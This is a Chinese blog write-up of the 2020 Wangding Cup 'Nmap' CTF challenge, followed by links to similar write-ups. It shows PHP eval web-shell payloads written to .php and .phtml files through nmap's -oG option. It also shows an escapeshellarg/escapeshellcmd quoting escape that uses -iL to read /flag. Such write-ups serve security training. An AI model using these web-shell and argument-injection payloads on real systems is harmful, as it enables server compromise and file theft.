[网鼎杯 2020 朱雀组]Nmap 通过nmap写入木马 argcmd过滤实现逃逸

最新推荐文章于 2024-05-05 02:50:49 发布
最新推荐文章于 2024-05-05 02:50:49 发布
阅读量354 收藏 1
点赞数 1
分类专栏: BUUctf 文章标签: nmap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/133029990
版权

这道题也很好玩 啊 原本以为是ssrf 或者会不会是rce

结果是通过nmap写入木马

我们来玩一下

传入木马

映入眼帘是nmap

我们首先就要了解nmap的指令

Nmap 相关参数

-iL 读取文件内容,以文件内容作为搜索目标
-o 输出到文件

    -oN 标准保存
    -oX XML保存
    -oG Grep保存
    -oA 保存到所有格式

我们将木马作为文件读取 然后输出到.php后缀中

<?php @eval($_POST['attack']);?>  -oG hak.php

我们换短标签看看

<? echo @eval($_POST['attack']); ?>  -oG hak.php

发现还不行 我们看看是不是php过滤了

果然 那我们使用其他的 例如phtml

'<? echo @eval($_POST["a"]);?> -oG hck.phtml '

 

任意文件读取

这里我不知道师傅们怎么知道存在 escapshellarg()和escapshellcmd()的

但是我们可以通过这两个来了解

escapshellarg()

这个的操作比较多

对类似非法的 进行 加引号和转义符

例如

'  ---->  '\''

escapshellcmd()

这个是对非法进行加转义符

' ----> \'

我们这里可以进行尝试

127.0.0.1' -iL /flag 1.txt

通过arg过滤是

'127.0.0.1'\'' -iL /flag 1.txt'

然后通过 cmd转义

这里会匹配\ 为非法 进行转义

'127.0.0.1'\\'' -iL /flag -o 1.txt'

那么这里 \\ '' 就会识别为\

所以简化就是

'127.0.0.1'\ -iL /flag -o1.txt'

从而爆出读取失败的值

这里报错值的原理是

去访问 文件 使用参数 -iL 
然后 读取失败 就会将读取的值报错出来

然后我们访问1.txt' 记得后面有一个逃逸的单引号

127.0.0.1'\ -iL /flag -o1.txt

就可以实现读取

双层小牛堡
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网鼎杯青龙18道.rar
06-11
【标题】"网鼎杯青龙18道.rar"是一个关于网络安全竞赛的资源压缩包,其中包含了2020网鼎杯青龙的比赛题目。网鼎杯是一项知名的网络安全技术竞赛,旨在提升参赛者的网络安全技能和实战能力,尤其针对青龙,...
扫描器篇(十)之python+nmap实现系统识别
12-21
本文主要介绍如何利用Python结合nmap工具来实现系统的识别。 首先,操作系统识别的目的是为了确定网络上的设备运行的是哪种操作系统,因为不同的操作系统可能默认开启不同的服务,而这些服务可能会有特定的漏洞。...
[网鼎杯 2020 朱雀]Nmap
pakho_C的博客
07-27 1533
nmap192.168.0.*--exclude192.168.0.100使用“-exclude”选项来排除某些你不想要扫描的主机。nmap-F192.168.0.101快速扫描,仅扫描nmap-services文件中的端口而避开所有其它的端口。nmap-O127.0.0.1使用选项“-O”和“-osscan-guess”也帮助探测操作系统信息。nmap-p80,443192.168.0.101使用“-P”选项指定你想要扫描的端口。...
BUUCTF [网鼎杯 2020 朱雀] Nmap
Senimo
12-09 3571
BUUCTF [网鼎杯 2020 朱雀] Nmap 考点:nmap -oG 写入文件、-iL读取扫描文件 解法:将nmap扫描结果写入文件时加入一句话木马 启动环境: 类似Nmap的功能,一个输入命令行,提示输入ip地址,尝试输入正常内容:127.0.0.1 可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令 127.0.0.1 | ls 可以看到|被\转义,尝试使用;: 提示地址错误,尝试了一些其他的命令执行,也无法实现,参考 ...
2024全国职业技能大赛-网络安全赛题解析总结⑨(超详细)_2024网鼎杯网络安全大赛题库(1)
最新发布
2401_84240129的博客
05-05 1038
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
[网鼎杯 2020 朱雀]Nmap(双解详细分析)
记录学习,一起进步
01-29 1055
[网鼎杯 2020 朱雀]Nmap
[网鼎杯 2020 朱雀]Nmap wp
qq_64201116的博客
08-24 804
2020朱雀杯]和的题目似乎是一样的,不同在于朱雀杯没有给出源码,主要考察的都是nmap一句话木马写入。本篇文章细致讲解输入时和两个函数所进行的步骤。
python调用masscan+nmap实现精确扫描
06-30
本教程将详细解释如何利用`Python`调用`masscan`和`nmap`这两个工具,实现精确且高效的网络扫描。 `masscan`是一个快速的TCP端口扫描器,它能以每秒几万个目标的速度扫描互联网,远超传统的`nmap`。而`nmap`则是一...
nmap命令 网络探测工具和安全和端口扫描器
01-20
Nmap以新颖的方式使用原始IP报文来发现网络上有哪些主机,那些主机提供什么服务(应用程序名和版本),那些服务运行在什么操作系统(包括版本信息), 它们使用什么类型的报文过滤器/防火墙,以及一堆其它功能。虽然Nmap...
nmap-bootstrap-xsl:具有Bootstrap的Nmap XSL实现
02-01
**Nmap Bootstrap XSL 实现详解** Nmap是一款强大的网络扫描工具,用于发现网络上的主机和服务,进行端口扫描、操作系统检测以及服务版本识别等多种安全评估任务。在Nmap的输出结果通常为XML格式,方便进一步的数据...
2020-网鼎杯-朱雀-Web-nmap
feng的博客
11-03 810
WP 和BUUCTF里的2018 Online Tool非常类似。 首先就是中是个nmap命令注入,有2个方式: 利用-oG,可以将命令和结果写进文件。 利用-iL 和-oN。其中-iL是从inputfilename文件中读取扫描的目标。在这个文件中要有一个主机或者网络的列表,由空格键、制表键或者回车键作为分割符。如果使用-iL-,nmap就会从标准输入stdin读取主机名字。你可以从指定目标一节得到更加详细的信息,-oN是把扫描结果重定向到一个可读的文件logfilename中。 关于escapesh
BUUCTF: [网鼎杯 2020 朱雀]Nmap
末初的CSDN博客
09-21 1982
是可以执行的,可以先上线一个shell,然后在服务器中检查使用其他参数的结果。会将执行语句记录输出文件。控制输出文件内容以及文件格式就可以解析了。的文件无法写入,尝试写入一些可能会解析的其他文件后缀。使用输出格式可以将指定的内容输出到指定的文件格式。对传入的参数的保护(感觉有点点猜的意思。但是这里还有些过滤,比如过滤了关键字。会把扫描结果导出到一个文件里面。题目环境经过测试可以发现只有。,那说明导出的文件格式是。即便执行失败也无所谓,
[⽹鼎杯 2020 朱雀]Nmap
zzqzzq11的博客
12-03 413
要值得⼀提的是,这个弄完之后会有很多转译符,原因在于本来nmap就是执⾏相关的,因此很多都需要转译,⽐如 | > < { \ ' " 等等。这个题和上⾯那个nmap是⼀样的。只是过滤了下php罢了。其实就是参数值跳出来变成参数选项。细节之前已经说的差不多了。⽤phtml绕过就⾏。前⾯已经分析得很多了。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 637
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
2020网鼎杯朱雀WEB——NMAP&PHPWEB
Pdsdt1的博客
05-18 4152
NMAP 考察的是比较老的知识点了,在BUU出现过的题目,nmap命令行参数注入 详细文章: https://blog.csdn.net/qq_26406447/article/details/100711933 访问题目,发现我们可以输入url,经过nmap扫描后会返回出结果,这里引入nmap命令中的一个参数 -oG #可以实现将命令和结果写到文件 源码大概的构造: echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host); 我们可以通过
[网鼎杯 2020 朱雀]phpweb
2301_76896268的博客
10-31 150
[网鼎杯 2020 朱雀]phpweb的题解以及一些自己的学习分享
[网鼎杯 2020 朱雀]nmap
03-16
nmap是一款网络扫描工具,可以用来扫描目标主机的开放端口、操作系统类型、服务版本等信息。它可以帮助安全人员评估网络安全状况,发现潜在的漏洞和攻击面。同时,nmap也可以用来管理网络,例如发现新设备、检查网络...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值